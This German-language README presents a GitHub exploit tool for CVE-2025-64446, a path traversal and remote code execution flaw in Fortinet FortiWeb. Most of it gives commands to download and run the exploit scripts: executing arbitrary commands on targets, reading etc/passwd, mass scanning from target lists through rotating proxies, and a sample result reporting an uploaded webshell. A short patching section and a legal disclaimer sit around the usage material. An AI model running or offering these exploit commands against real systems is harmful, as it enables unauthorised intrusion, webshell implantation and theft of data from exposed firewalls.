
Sicherheitsforschungstool zur Erkennung und Prüfung von CVE-2025-64446 (FortiWeb Path Traversal RCE-Schwachstelle)
Ein Sicherheitsforschungstool zur Erkennung und Prüfung der Sicherheitslücke CVE-2025-64446 in der Web Application Firewall (WAF) Fortinet FortiWeb. Diese kritische Zero-Day-Path-Traversal-Schwachstelle wird derzeit aktiv in freier Wildbahn ausgenutzt und ermöglicht es nicht authentifizierten Angreifern, Sicherheitskontrollen zu umgehen und beliebigen Code auszuführen.
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Der unbefugte Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
CVE-2025-64446 ist eine kritische Zero-Day-Path-Traversal-Schwachstelle in der Fortinet FortiWeb WAF, die derzeit aktiv in freier Wildbahn ausgenutzt wird. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, durch Path-Traversal-Angriffe Sicherheitskontrollen zu umgehen, was potenziell zu Remote-Code-Ausführung, Zugriff auf Konfigurationsdateien und vollständiger Systemkompromittierung führen kann.
CVSS-Score: 9.8 (Kritisch)
Status: Aktiv in freier Wildbahn ausgenutzt
CISA KEV: Zum Katalog der bekannten ausgenutzten Schwachstellen hinzugefügt
Patch: FG-IR-25-910
Betroffenes Produkt: Fortinet FortiWeb WAF
# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit
# Install dependencies
pip install -r requirements.txt
# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py
# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py
# Install dependencies
pip install requests
# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com
# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"
# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5
# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port
# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com
# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd
# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v
-u, --url Ziel-URL
-f, --file Datei mit Ziel-URLs (eine pro Zeile)
-c, --command Auszuführender Befehl (Standard: id)
-t, --threads Anzahl der Threads (Standard: 1)
-o, --output Ausgabedatei (Standard: uknf_fortiweb_results.json)
-v, --verbose Ausführliche Protokollierung aktivieren
--proxy Proxy-URL (z. B. http://127.0.0.1:8080)
--proxy-list Datei mit Proxy-URLs (eine pro Zeile)
Das Skript generiert eine JSON-Datei mit detaillierten Ergebnissen:
{
"target": "http://target.com",
"timestamp": "2025-11-21T00:25:40.123456",
"fortiweb_detected": true,
"vulnerable": true,
"path_traversal_successful": true,
"config_file_read": true,
"webshell_uploaded": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_payload": "../../../../etc/passwd"
}
Falls Sie FortiWeb WAF verwenden:
Sicherheitsupdates sofort einspielen:
# Check current version
show system status
# Update to latest version
execute upgrade <firmware-file>
Netzwerksegmentierung:
Konfigurationshärtung:
CISA-Anforderungen:
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"
# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com
# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd
Beiträge sind willkommen! Zögern Sie nicht, einen Pull Request einzureichen.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Wenn Sie auf Probleme stoßen oder Vorschläge haben, eröffnen Sie bitte ein Issue auf GitHub.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
Wenn Sie dieses Tool nützlich finden, ziehen Sie bitte in Betracht, ihm einen Stern auf GitHub zu geben!
Dieses Tool wird ausschließlich für Bildungs- und autorisierte Sicherheitstests bereitgestellt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen die entsprechende Genehmigung haben.
Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Vielen Dank für Ihre Unterstützung! 🙏